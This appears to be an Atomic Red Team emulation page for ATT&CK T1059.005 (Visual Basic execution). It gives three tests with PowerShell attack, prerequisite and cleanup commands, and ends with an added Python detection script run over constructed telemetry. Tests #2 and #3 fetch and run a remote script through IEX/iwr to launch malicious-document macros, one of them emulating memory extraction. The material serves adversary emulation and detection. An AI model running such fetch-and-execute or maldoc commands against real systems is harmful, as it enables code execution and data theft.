T1059.005 - Command and Scripting Interpreter: Visual Basic

Description from ATT&CK

Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft) Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads (which may also involve [Mark-of-the-Web Bypass](https://attack.mitre.org/techniques/T1553/005) to enable execution).(Citation: Default VBS macros Blocking )

Atomic Tests


Atomic Test #1 - Visual Basic script execution to gather local computer information

Visual Basic execution test: runs a VBScript file through cscript, launched from PowerShell.

When successful, system information will be written to $env:TEMP\T1059.005.out.txt.

Supported Platforms: Windows

auto_generated_guid: 1620de42-160a-4fe5-bbaf-d3fef0181ce9

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| vbscript | Path to sample script | string | PathToAtomicsFolder\T1059.005\src\sys_info.vbs |

Attack Commands: Run with `powershell`!

```powershell
cscript "#{vbscript}" > $env:TEMP\T1059.005.out.txt
```

Cleanup Commands:

```powershell
Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
```

Dependencies: Run with `powershell`!

Description: Sample script must exist on disk at specified location (#{vbscript})

Check Prereq Commands:

```powershell
if (Test-Path "#{vbscript}") {exit 0} else {exit 1}
```

Get Prereq Commands:

```powershell
New-Item -ItemType Directory (Split-Path "#{vbscript}") -Force | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "#{vbscript}"
```



Atomic Test #2 - Encoded VBS code execution

This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution a message box will pop up displaying “ART T1059.005”.

Note: because this module uses “ScriptControl”, a 64-bit version of Microsoft Office is required. You can validate this by opening WinWord -> File -> Account -> About Word.

Supported Platforms: Windows

auto_generated_guid: e8209d5f-e42d-45e6-9c2f-633ac4f1eefa

Attack Commands: Run with `powershell`!

```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
```

Cleanup Commands:

```powershell
Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
```

Dependencies: Run with `powershell`!

Description: The 64-bit version of Microsoft Office must be installed

Check Prereq Commands:

```powershell
try {
  $wdApp = New-Object -COMObject "Word.Application"
  $path = $wdApp.Path
  Stop-Process -Name "winword"
  if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
} catch { exit 1 }
```

Get Prereq Commands:

```powershell
Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"
```



Atomic Test #3 - Extract Memory via VBA

This module emulates a well-known technique malware authors use to extract data from memory or binary files. It first creates a string in memory, then obtains a pointer to that string, and finally uses the pointer to copy the contents of that memory location to a file at $env:TEMP\atomic_t1059_005_test_output.bin.

Supported Platforms: Windows

auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ms_product | Maldoc application Word | string | Word |

Attack Commands: Run with `powershell`!

```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"
```

Cleanup Commands:

```powershell
Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore
```

Dependencies: Run with `powershell`!

Description: Microsoft #{ms_product} must be installed

Check Prereq Commands:

```powershell
try {
  New-Object -COMObject "#{ms_product}.Application" | Out-Null
  $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }
```

Get Prereq Commands:

```powershell
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
```
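Detection logic for the telemetry the three tests above produce, as an added example that is not part of the Atomic Red Team page or its scripts: Test #1 leaves a cscript process with a .vbs on its command line, Test #2 leaves an Office process spawning mshta, and Test #3 leaves an Office process writing a .bin into the user's TEMP directory. The Sysmon-style field names, the user name "lab" and the sample event values are constructed assumptions for this example.

```python
"""Flag the process-creation and file-write shapes of the T1059.005 atomics.

Added example, not code from the Atomic Red Team project. The Event fields are
an assumed, Sysmon-like subset; SAMPLE_EVENTS is constructed telemetry.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

SCRIPT_HOSTS = {"cscript.exe", "wscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "cmd.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|hta)\b", re.IGNORECASE)


@dataclass
class Event:
    kind: str                # "process" (creation) or "file" (write)
    image: str               # full path of the acting process
    parent_image: str = ""   # process events only
    command_line: str = ""   # process events only
    target: str = ""         # file events only: path that was written


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path ("" stays "")."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: Event) -> List[Tuple[str, str]]:
    """Return (rule_name, detail) findings for a single event."""
    findings: List[Tuple[str, str]] = []
    img, parent = basename(ev.image), basename(ev.parent_image)
    if ev.kind == "process":
        # Test #1 shape: a script host given a script file on its command line
        if img in SCRIPT_HOSTS and SCRIPT_EXT.search(ev.command_line):
            findings.append(("script_host_runs_script", ev.command_line))
        # Test #2 shape: an Office app spawning a script host or shell (macro ran)
        if parent in OFFICE_APPS and img in SCRIPT_HOSTS | SHELLS:
            findings.append(("office_spawns_script_host", f"{parent} -> {img}"))
    elif ev.kind == "file":
        # Test #3 shape: an Office app dropping a .bin into the user's TEMP
        tgt = ev.target.lower()
        if img in OFFICE_APPS and "\\temp\\" in tgt and tgt.endswith(".bin"):
            findings.append(("office_writes_binary_to_temp", ev.target))
    return findings


def scan(events: List[Event]) -> Dict[str, int]:
    """Count findings per rule across a batch of events."""
    counts: Dict[str, int] = {}
    for ev in events:
        for rule, _ in classify(ev):
            counts[rule] = counts.get(rule, 0) + 1
    return counts


# Constructed sample telemetry (not captured logs). Paths use the page's default
# PathToAtomicsFolder (C:\AtomicRedTeam) and a hypothetical user named "lab".
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\cscript.exe",
          r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r'cscript "C:\AtomicRedTeam\atomics\T1059.005\src\sys_info.vbs"'),
    Event("process", r"C:\Windows\System32\mshta.exe",
          r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
          r'mshta.exe "C:\Users\lab\AppData\Local\Temp\sample.hta"'),
    Event("file", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
          target=r"C:\Users\lab\AppData\Local\Temp\atomic_t1059_005_test_output.bin"),
    # Benign controls: Explorer launching Notepad, Word saving a document
    Event("process", r"C:\Windows\System32\notepad.exe",
          r"C:\Windows\explorer.exe", "notepad.exe"),
    Event("file", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
          target=r"C:\Users\lab\Documents\report.docx"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        for rule, detail in classify(ev):
            print(f"[{rule}] {detail}")
    print(scan(SAMPLE_EVENTS))
```

The three rules map one-to-one onto the tests' observable side effects, which is why the cscript event trips only the command-line rule while the mshta child of WINWORD.EXE trips both the command-line and the parent-child rule; the two benign events produce no findings. When feeding real Sysmon Event ID 1 and 11 records, the parent-child rule is the one least likely to be noisy, since Office applications rarely spawn script hosts or shells in normal use.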